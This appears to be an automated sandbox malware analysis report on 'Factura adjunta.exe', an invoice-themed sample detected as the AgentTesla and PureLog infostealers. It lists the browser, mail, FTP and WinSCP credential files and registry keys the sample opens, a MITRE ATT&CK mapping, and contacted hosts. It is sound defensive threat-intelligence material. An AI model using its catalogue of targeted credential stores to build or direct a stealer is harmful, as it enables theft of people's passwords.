                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_00814C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00814C03
                    Source: Factura adjunta.exe, 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: Factura adjunta.exeBinary or memory string: Shell_TrayWnd
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007D886B cpuid 0_2_007D886B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoA,2_2_00417A20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007E50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_007E50D7
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007F2230 GetUserNameW,0_2_007F2230
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007E418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_007E418A
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_007B4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007B4AFE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2b1f4a6.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3ef5570.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2e70ee8.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3ef6458.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2e70ee8.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2b2038e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3f43f90.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.5270000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3ef6458.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2b1f4a6.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2e70000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.5270000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2b2038e.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3f43f90.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2e70000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3ef5570.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4640275179.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4640275179.0000000002F89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4640275179.0000000002F57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4641648764.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4639975848.0000000002ADF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4642126380.0000000005270000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4640161809.0000000002E70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5688, type: MEMORYSTR
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2b1f4a6.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3ef5570.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2e70ee8.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3ef6458.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2e70ee8.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2b2038e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3f43f90.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.5270000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3ef6458.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2b1f4a6.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2e70000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.5270000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2b2038e.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3f43f90.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2e70000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3ef5570.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4641648764.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4639975848.0000000002ADF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4642126380.0000000005270000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4640161809.0000000002E70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: Factura adjunta.exeBinary or memory string: WIN_81
                    Source: Factura adjunta.exeBinary or memory string: WIN_XP
                    Source: Factura adjunta.exeBinary or memory string: WIN_XPe
                    Source: Factura adjunta.exeBinary or memory string: WIN_VISTA
                    Source: Factura adjunta.exeBinary or memory string: WIN_7
                    Source: Factura adjunta.exeBinary or memory string: WIN_8
                    Source: Factura adjunta.exe, 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2b1f4a6.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3ef5570.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2e70ee8.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3ef6458.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2e70ee8.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2b2038e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3f43f90.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.5270000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3ef6458.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2b1f4a6.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2e70000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.5270000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2b2038e.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3f43f90.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2e70000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3ef5570.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4640275179.0000000002F57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4641648764.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4639975848.0000000002ADF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4642126380.0000000005270000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4640161809.0000000002E70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5688, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2b1f4a6.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3ef5570.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2e70ee8.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3ef6458.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2e70ee8.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2b2038e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3f43f90.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.5270000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3ef6458.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2b1f4a6.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2e70000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.5270000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2b2038e.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3f43f90.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2e70000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3ef5570.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4640275179.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4640275179.0000000002F89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4640275179.0000000002F57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4641648764.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4639975848.0000000002ADF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4642126380.0000000005270000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4640161809.0000000002E70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5688, type: MEMORYSTR
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2b1f4a6.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3ef5570.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2e70ee8.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3ef6458.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2e70ee8.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2b2038e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3f43f90.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.5270000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3ef6458.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2b1f4a6.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2e70000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.5270000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2b2038e.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3f43f90.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.2e70000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.3ef5570.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4641648764.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4639975848.0000000002ADF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4642126380.0000000005270000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4640161809.0000000002E70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_00826596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00826596
                    Source: C:\Users\user\Desktop\Factura adjunta.exeCode function: 0_2_00826A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00826A5A

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure2
                    Valid Accounts                    		221
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    Exploitation for Privilege Escalation                    		11
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		2
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts2
                    Native API                    		2
                    Valid Accounts                    		1
                    DLL Side-Loading                    		11
                    Deobfuscate/Decode Files or Information                    		221
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                    Valid Accounts                    		21
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		2
                    File and Directory Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                    Access Token Manipulation                    		11
                    Software Packing                    		NTDS148
                    System Information Discovery                    		Distributed Component Object Model221
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                    Process Injection                    		1
                    DLL Side-Loading                    		LSA Secrets561
                    Security Software Discovery                    		SSH4
                    Clipboard Data                    		23
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                    Valid Accounts                    		Cached Domain Credentials231
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items231
                    Virtualization/Sandbox Evasion                    		DCSync2
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                    Access Token Manipulation                    		Proc Filesystem11
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                    Process Injection                    		/etc/passwd and /etc/shadow1
                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Network Configuration Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Factura adjunta.exe63%ReversingLabsWin32.Spyware.RedLine
                    Factura adjunta.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://api.ipify.org/0%URL Reputationsafe
                    https://api.ipify.org0%URL Reputationsafe
                    https://account.dyn.com/0%URL Reputationsafe
                    https://api.ipify.org/t0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                    http://ip-api.com0%URL Reputationsafe
                    http://mail.floormelody.com.sg0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ipify.org
                    		104.26.12.205
                    		truefalse
                      		unknown
                      ip-api.com
                      		208.95.112.1
                      		truetrue
                        		unknown
                        mail.floormelody.com.sg
                        		101.100.211.111
                        		truetrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/false
                          • URL Reputation: safe
                          		unknown
                          http://ip-api.com/line/?fields=hostingfalse
                          • URL Reputation: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://api.ipify.orgRegSvcs.exe, 00000002.00000002.4639975848.0000000002ADF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4641648764.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4640275179.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4642126380.0000000005270000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4640161809.0000000002E70000.00000004.08000000.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://account.dyn.com/RegSvcs.exe, 00000002.00000002.4639975848.0000000002ADF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4641648764.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4642126380.0000000005270000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4640161809.0000000002E70000.00000004.08000000.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://api.ipify.org/tRegSvcs.exe, 00000002.00000002.4640275179.0000000002EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://mail.floormelody.com.sgRegSvcs.exe, 00000002.00000002.4640275179.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000002.00000002.4640275179.0000000002EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://ip-api.comRegSvcs.exe, 00000002.00000002.4640275179.0000000002F44000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          208.95.112.1
                          		ip-api.comUnited States
                          		53334TUT-ASUStrue
                          104.26.12.205
                          		api.ipify.orgUnited States
                          		13335CLOUDFLARENETUSfalse
                          101.100.211.111
                          		mail.floormelody.com.sgSingapore
                          		58621VODIEN-AS-AP-LOC2VodienInternetSolutionsPteLtdSGtrue

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1467274
                          Start date and time:2024-07-04 00:03:08 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 9m 4s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:8
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:Factura adjunta.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@3/4@3/3
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 95%
                          • Number of executed functions: 58
                          • Number of non-executed functions: 277
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: Factura adjunta.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          18:04:09API Interceptor12142506x Sleep call for process: RegSvcs.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          208.95.112.1thegreatestexecutor.batGet hashmaliciousUnknownBrowse
                          • ip-api.com/json
                          thegreatestexecutor.batGet hashmaliciousUnknownBrowse
                          • ip-api.com/json
                          QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • ip-api.com/line/?fields=hosting
                          Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          6bdudXAsQW.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          H50bdqfVH2.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
